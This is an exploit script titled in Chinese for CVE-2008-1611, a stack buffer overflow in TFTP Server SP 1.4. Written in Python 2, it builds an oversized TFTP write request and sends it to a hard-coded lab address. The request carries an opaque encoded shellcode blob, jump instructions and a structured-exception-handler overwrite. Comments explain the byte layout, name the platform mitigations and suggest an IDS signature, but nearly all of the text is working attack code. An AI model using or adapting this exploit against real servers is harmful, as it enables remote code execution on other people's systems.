
CVE-2008-1611 TFTP Server SP 1.4堆栈缓冲区溢出漏洞



POC

import struct
import socket

# CVE-2008-1611 PoC written by Axua

# Wire layout of the crafted TFTP request. All literals are plain str, which
# are byte strings only under Python 2; Python 3's sendto() rejects str, so
# this script as written is a Python 2 script.
# Bytes 0-1: TFTP opcode 0x0002 (WRQ); bytes 2-5: start of the filename "/.:/".
prefix = "\x00\x02\x2f\x2e\x3a\x2f"
# Three NULs close the oversized filename field, then the transfer mode
# "netascii" (0x6e 0x65 0x74 0x61 0x73 0x63 0x69 0x69) with its own NUL, so the
# datagram still parses as a syntactically complete WRQ.
suffix = "\x00\x00\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00"

# Opaque machine-code blob carried inside the filename. Nothing on the page
# documents what it does (no disassembly, no generator options); treat it as
# untrusted and do not run it outside an isolated lab.
shellcode = (
"\xbb\x1b\xd0\x39\x36\xdd\xc7\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x31\x58\x12\x03\x58\x12\x83\xdb\xd4\xdb\xc3\x27\x3c\x99"
"\x2c\xd7\xbd\xfe\xa5\x32\x8c\x3e\xd1\x37\xbf\x8e\x91\x15\x4c"
"\x64\xf7\x8d\xc7\x08\xd0\xa2\x60\xa6\x06\x8d\x71\x9b\x7b\x8c"
"\xf1\xe6\xaf\x6e\xcb\x28\xa2\x6f\x0c\x54\x4f\x3d\xc5\x12\xe2"
"\xd1\x62\x6e\x3f\x5a\x38\x7e\x47\xbf\x89\x81\x66\x6e\x81\xdb"
"\xa8\x91\x46\x50\xe1\x89\x8b\x5d\xbb\x22\x7f\x29\x3a\xe2\xb1"
"\xd2\x91\xcb\x7d\x21\xeb\x0c\xb9\xda\x9e\x64\xb9\x67\x99\xb3"
"\xc3\xb3\x2c\x27\x63\x37\x96\x83\x95\x94\x41\x40\x99\x51\x05"
"\x0e\xbe\x64\xca\x25\xba\xed\xed\xe9\x4a\xb5\xc9\x2d\x16\x6d"
"\x73\x74\xf2\xc0\x8c\x66\x5d\xbc\x28\xed\x70\xa9\x40\xac\x1c"
"\x1e\x69\x4e\xdd\x08\xfa\x3d\xef\x97\x50\xa9\x43\x5f\x7f\x2e"
"\xa3\x4a\xc7\xa0\x5a\x75\x38\xe9\x98\x21\x68\x81\x09\x4a\xe3"
"\x51\xb5\x9f\xa4\x01\x19\x70\x05\xf1\xd9\x20\xed\x1b\xd6\x1f"
"\x0d\x24\x3c\x08\xa4\xdf\xd7\xf7\x91\xbd\x33\x90\xe3\x41\x2d"
"\x3c\x6d\xa7\x27\xac\x3b\x70\xd0\x55\x66\x0a\x41\x99\xbc\x77"
"\x41\x11\x33\x88\x0c\xd2\x3e\x9a\xf9\x12\x75\xc0\xac\x2d\xa3"
"\x6c\x32\xbf\x28\x6c\x3d\xdc\xe6\x3b\x6a\x12\xff\xa9\x86\x0d"
"\xa9\xcf\x5a\xcb\x92\x4b\x81\x28\x1c\x52\x44\x14\x3a\x44\x90"
"\x95\x06\x30\x4c\xc0\xd0\xee\x2a\xba\x92\x58\xe5\x11\x7d\x0c"
"\x70\x5a\xbe\x4a\x7d\xb7\x48\xb2\xcc\x6e\x0d\xcd\xe1\xe6\x99"
"\xb6\x1f\x97\x66\x6d\xa4\xa9\x97\xbf\x31\x3d\x0e\x2a\x78\x23"
"\xb1\x81\xbf\x5a\x32\x23\x40\x99\x2a\x46\x45\xe5\xec\xbb\x37"
"\x76\x99\xbb\xe4\x77\x88")

# 236 bytes of 0x41 sit between the filename prefix and the shellcode.
padding1 = "\x41" * 236
# 0x42 filler sized so that shellcode + padding2 is always exactly 984 bytes;
# this pins far_jump, nseh and seh to a fixed offset regardless of shellcode
# length. Note: if len(shellcode) ever exceeded 984 this would go negative and
# silently produce an empty string, shifting every later field.
padding2 = "\x42" * (984 - len(shellcode))

# 5-byte E9 rel32 jump; 0xFFFFFC23 is -989. Measured from the end of this
# instruction that is offset 6 + 236 + 984 + 5 - 989 == 242 == len(prefix) +
# len(padding1), i.e. the first byte of shellcode.
far_jump = "\xE9\x23\xFC\xFF\xFF"

# EB rel8 short jump: displacement byte 0xF9 is -7 from the end of the 2-byte
# instruction, so it lands 5 bytes back — exactly at far_jump, which directly
# precedes this field. (The original note said -8; -7 is the encoded value.)
# The two 0x90 NOPs pad the field to 4 bytes.
nseh = "\xEB\xF9\x90\x90" # jmp short -8
# Only 3 bytes are written, so the high byte of the overwritten handler is
# supplied by the NUL that terminates the filename (hence 0x00402b8c). A
# gadget inside the target executable is usable only if that module carries
# no SafeSEH table — not verifiable from this page. SafeSEH, SEHOP and DEP are
# the platform mitigations that break this class of handler overwrite.
seh = "\x8c\x2b\x40" # POP EDI; POP EBP; RET; @ TFTPServerSP.exe # partial overwrite 0x00402b8c

# Assemble the datagram in wire order. Total length is 6 + 236 + 984 + 5 + 4
# + 3 + 12 == 1250 bytes, far beyond any legitimate TFTP filename.
payload =  prefix
payload += padding1
payload += shellcode
payload += padding2
payload += far_jump
payload += nseh 
payload += seh   
payload += suffix

# Single UDP datagram to port 69 of a hard-coded RFC 1918 lab address; no
# reply is read and no error is handled. Detection note for defenders: a WRQ
# whose filename field is ~1.2 KB and dominated by long 0x41/0x42 runs is a
# trivial IDS signature, and any TFTP filename of hundreds of bytes is itself
# anomalous enough to alert on.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(payload, ("192.168.99.155", 69))


